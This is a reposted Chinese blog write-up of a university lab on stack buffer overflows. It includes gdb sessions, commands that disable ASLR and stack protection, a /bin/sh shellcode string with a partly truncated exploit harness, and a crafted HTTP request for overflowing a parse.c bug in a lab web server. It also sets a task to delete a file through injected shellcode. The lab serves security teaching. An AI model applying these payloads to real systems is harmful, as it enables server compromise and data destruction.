博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
信息安全实验一:buffer-overflow
阅读量:5772 次
发布时间:2019-06-18

本文共 10000 字,大约阅读时间需要 33 分钟。

title: buffer-overflow

date: 2016-01-10 14:17:17
categories: information-security
tags: buffer-overflow
---

  • Excrcise1
    Now, you can write some code. Your job is to print the address of the variable buffer,
    in the C program stack1.c, and compile the C program as above.Run it three times,
    observe and write down the output addresses in address.txt, are these 3 addresses the same or not?
    • 打印首地址 运行3次 每次地址不同
    #include 
    #include
    #include
    void badman() { printf("I am the bad man\n"); return; } int func(char *str) { int variable_a; char buffer[12]; printf("address:%p\n",buffer); strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char *buf = "hello\n"; if(argc > 1){ buf = argv[1]; } func(buf); printf("Returned Properly\n"); return 1; }

  • Excrcise2
    Use gdb to debug the program, as the following. You may find the online gdb documentation useful.
    • GDB常见命令
    打开gdb 调试工具:gdb -q(gdb)file stack1 启动待调试程序(gdb)b func 在函数func 处设置断点(gdb)r 运行程序(gdb)i r 查看所有寄存器的值(gdb)x/2s 0xbffff3a0 地址0xbffff3a0 开始读取2 个单元字符串内容 (默认4 字节,以下相同)(gdb)p &buffer 打印变量buffer[]首地址(gdb)x/4wx 0xbffff3a0 地址0xbffff3a0 开始读取4 个单元、以4 字节为单位、以16 进制显示内容(gdb)x/8wx $ebp 寄存器ebp 开始读取8 个单元、以4 字节为单位、以16 进制显示内容(gdb)x/2i 0x08048443 查看地址0x08048443 开始2 个单元指令(gdb)disass func 查看函数func 的汇编代码(gdb)q 退出
    • 使用GDB调试示例:
    $ gdb stack1(gdb) b  funcBreakpoint 1 at 0x8048412: file stack.c, line 8.(gdb) rStarting program: /tmp/stack18      strcpy(buffer,str);(gdb) info reax            0x80484e8    134513896ecx            0xbffff504    -1073744636edx            0xbffff494    -1073744748ebx            0xb7fc8000    -1208188928esp            0xbffff410    0xbffff410ebp            0xbffff438    0xbffff438esi            0x0    0edi            0x0    0eip            0x8048412    0x8048412eflags         0x282    [ SF IF ]cs             0x73    115ss             0x7b    123ds             0x7b    123es             0x7b    123fs             0x0    0gs             0x33    51(gdb) x/2s 0x80484e80x80484e8:     "I am greater than 12 bytes"0x8048503:     ""(gdb) p &buffer$1 = (char (*)[12]) 0xbffff424(gdb) x/4wx 0xbffff4240xbffff424:    0x08048320    0x00000000    0x080482bd    0xb7fc83e4(gdb) x/8wx $ebp0xbffff438:    0xbffff468    0x08048443    0x080484e8    0xbffff5040xbffff448:    0xbffff50c    0xb7e54225    0xb7fed280    0x00000000(gdb) x/2i 0x080484430x8048443 :    leave0x8048444 :    ret(gdb) disass funcDump of assembler code for function func:0x0804840c :    push   %ebp0x0804840d :    mov    %esp,%ebp0x0804840f :    sub    $0x28,%esp0x08048412 :    mov    0x8(%ebp),%eax0x08048415 :    mov    %eax,0x4(%esp)

  • Exercise3
    Turn off the address space layout randomization, and then do exercise 1 again,
    write down the three addresses in args.txt, are those three addresses same or not?
    • 关闭地址随机化 多次打印变量缓冲区地址相同
    sysctl -w kernel.randomize_va_space=0

  • Exercise4
    A buffer overflow occurs when data written to a buffer exceeds the length of the buffer,
    so that corrupting data values in memory addresses adjacent the end of the buffer.
    This often occurs when copying data into a buffer without sufficient bounds checking.
    You can refer to Aleph One’s famous article to figure out how buffer overflows work.
    • Now, you run the program stack1, just like below.
    $ ./stack1 aaaaaaaaaa  Returned Properly  $ ./stack1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  Segmentation fault
    If you don’t observe Segmentation fault, just increase the number of the input as.
    Here, the message Segmentation fault indicates that your program crashed due to invalid memory access
    (for instance, refer to memory address 0).

  • Exercise4
    Use gdb, to print the value of the register %eip when the program crashes.
    • How does the program run to this address?
    程序执行时传入参数aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa得出程序崩溃时%eip 的值为0x61由于传入的参数长度超过了buffer 缓冲区的大小,在进行字符串复制的时候,buffer[]不足以容纳传入的字符串aaaaaaaaaaaaaaaaaaa,导致了缓冲区溢出。

  • Exercise5
    The -z execstack option will mark the stack segment executable,
    which you’ll study in detail in lab 2.
    • May you have seen there is a function name badman in the stack1.c,
      but we never use it. Now let’s do a exercise, we’ll invoke it manually.
    $ make stack1  $ gdb stack1 -q  (gdb) b func  Breakpoint 1 at 0x804844a: file stack1.c, line 20.  (gdb) r  Breakpoint 1, func (str=0x8048551 "hello\n") at stack1.c:20  20      strcpy(buffer, str);  (gdb) p badman  $1 = {void ()} 0x804842b 
    (gdb) i r $ebp ebp 0xffffd828 0xffffd828 (gdb) x/wx $ebp+4 0xffffd82c: 0x08048496 (gdb) bt #0 func (str=0x8048551 "hello\n") at stack1.c:20 #1 0x08048496 in main (argc=1, argv=0xffffd904) at stack1.c:33 (gdb) set *0xffffd82c=0x0804842b (gdb) c Continuing. I am the bad man Program received signal SIGSEGV, Segmentation fault. 0x08048556 in ?? () (gdb)
    • What is stored in the address 0xFFFFd82c ?

      存放的是ret 也就是函数func()返回地址
    • Why after change its value to 0x0804842B, the function banman get invoked ?

      0x0804842b是badman()地址0xffffd82c是func()ret的地址set *0xffffd82c=0x0804842b 强制使func返回的时候进入badman()函数所以导致了函数badman()被调用了
    • Why the Program result s SegmentFault?

      提示信息:Program received signal SIGSEGV, Segmentation fault.说明了程序执行了无效的内存引用。因为在正常的代码中,没有地方调用函数badman(),所以执行完函数badman()返回时会发生错误。
    • IF we don't want to get a SegmentFault, what we should do ?

      不出现Segmentation fault 的思路是:保存*(ebp+4),进入函数badman()之后,用保存的*(ebp+4)覆盖此刻的*(ebp+4)的值,这样程序就能顺利进入到main()函数。

  • Exercise6
    • The shellcode we offered can pop up a shell, Now it’s your turn to attack the C program named stack.c
      using shellcode, you will get a shell if you succeed. You should compile and run your program as follows:
    $ make stack2  $ ./stack2  sh-3.2$ id  uid=1000(seed) gid=1000(seed) groups=4(adm),20(dialout),24(cdrom),  46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(seed)  sh-3.2$ exit
    Here, the -fno-stack-protector option will disable gcc’s stack canary.
    Hint: you can use the gdb when necessary, but keep in mind that there are some minor differences between the result from gdb
    and that from the stand-alone executable.
    • 关闭linux内核内存地址随机化
    sysctl –w kernel.randomize_va_space=0
    • 关闭gcc编译器金丝雀
    -fno-stack-protector
    • 关闭堆栈段不可执行
    -z execstack
    • You may look up the Intel Manual to know why the shellcode works.
    #include 
    #include
    #include
    char shellcode[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; // size = 24 int func(char *str) { char buffer[128]; int i; int* ptr=(int*)str; for(i=6;i<40;i++)//the size of shell code 24 bytes *(ptr+i)=(int)buffer;//buffer首地址覆盖func()返回值 strcpy(buffer, str); return 1; } int main(int argc, char**argv) { char buffer[1024]; int i; for(i=0;i

  • Exercise7
    All the source code for touchstone is stored in the code repository.
    • Now compile the touchstone web server and deploy it:
    $ make  $ ./touchstone
  • Open your browser to input this URL ,
    you will get a simple “hello, world” page.
    Study the web server's code, and look for code vulnerability which can be exploited to crash
    the server by buffer overflows, pay special attention to the file parse.c.
    Write down a description of each vulnerability in the file named bugs.txt.
    • Note:
      For each vulnerability, how you would construct the input (i.e., the HTTP request) to overflow the buffer,
      Locate at least one vulnerabilities. Here is a tutorial of the HTTP protocol,
      you can focus on the GET request.
    • parse.c
    getToken 函数对' '和'\r\n'以外字符直接进行存储,并且都不经过数组边界检查,所以s数  组是很容易溢出的,而且当遇到'\r'时,如果后面没有'\n',输入的字符也会被一概存入s;  s 数组溢出之后不仅可以修改return address 从而改变程序执行流,而且可以修改参数fd,  比如我们可以将其改为0,那么当getToken 再调用getChar 时,read 函数会去标准输入  读取字符,这样就可以使服务器端程序停住,而客户端浏览器处于”死等“状态。

  • Excrcise8
    • Even though the vulnerability has been detected in the web server, it’s still difficult for you to crash the server,

      because your browser will do most of the dirty work for you that you can not control, that is,
      you can only do good things with such a browser. So, as a hacker, you have to write your own browser from scratch.

    • We have offered you a simple browser in the file browser.c, basically,
      this browser will construct an http request and then send to the web server, waiting for the server’s response.
    • construct an input to send to the touchstone web server
    For the buffer overflow vulnerability you've found,     construct an input to send to the touchstone web server,    your goal is to crash the web server (the http server daemon).     Note: if you're successful to crash the web server,    your browser will remain dead-waiting to receive data from the server.    Don't forget that any valid request must end up with \r\n\r\n.
    • browser.c
    对于以上找到的漏洞,在browser.c 中添加请求字符串,达到crash sever 的目的,  效果是客户端一直处于等待response 的状态。  攻击的关键在于找到返回地址所在的地址,我们可以用gdb 调试的方法找到这个地址,  也可以在parse.c 中输出s 和fd 的地址,  那么ret 就在&fd 这个地址,这里之所以还要找到s 的地址是因为,返回地址的下一个字存放的是fd,  我们如果改变了fd,那么调用getChar 时,read 函数不再是去客户端socket 读取值,  而是根据文件描述符fd 去其它文件读了。  编写一个无限循环的shellcode,如  while(1);  编译后用objdump 可以查看其机器码,我们可以看到是eb fe,  我们将NOP,shellcode,addr分别填入大小为&fd-s 的数组,  还有一个关键处是我们还要在数组最后加一个' ',这是getToken 函数的出口之一,另一个是'\r\n'.  将shellcode 代码存入缓冲区,在最后一个字节填入' ',具体的代码如下:      char req[1065];      int i;      for(i=0;i<1064;++i)      req[i] = 0;      for(i=0;i

  • Excrcise9
    Crashing the web server is just the first step, now you should try to do some thing interesting,
    say, to delete some sensitive files (for example, the grades.txt). To start with,
    you can use the program create-shellcode.c,
    to construct your shellcode, you may have to modify the file according to your need.
    And you can copy your shellcode to the C program test-shell.c.
    • delete grades.txt
    Perform your attack by constructing an exploit that hijacks control flow of the web server  and unlink (delete) grades.txt.  Remember that the web server is on your computer,  so you should create a file named grades.txt first.

转载于:https://www.cnblogs.com/ailx10/p/5251641.html

你可能感兴趣的文章
Oracle 备份与恢复学习笔记(14)
查看>>
分布式配置中心disconf第一部(基本介绍)
查看>>
Scenario 9-Shared Uplink Set with Active/Active uplink,802.3ad(LACP)-Flex-10
查看>>
UML类图中的六种关系
查看>>
探寻Interpolator源码,自定义插值器
查看>>
一致性哈希
查看>>
mysql(待整理)
查看>>
使用PullToRefresh实现下拉刷新和上拉加载
查看>>
mysql
查看>>
2012年电信业八大发展趋势
查看>>
Web日志安全分析工具 v2.0发布
查看>>
JS重载
查看>>
python2和python3同安装在Windows上,切换问题
查看>>
php加速工具xcache的安装与使用(基于LNMP环境)
查看>>
android超链接
查看>>
redhat tomcat
查看>>
统计数据库大小
查看>>
IO流的学习--文件夹下文件的复制
查看>>
第十六章:脚本化HTTP
查看>>
EXCEL表中如何让数值变成万元或亿元
查看>>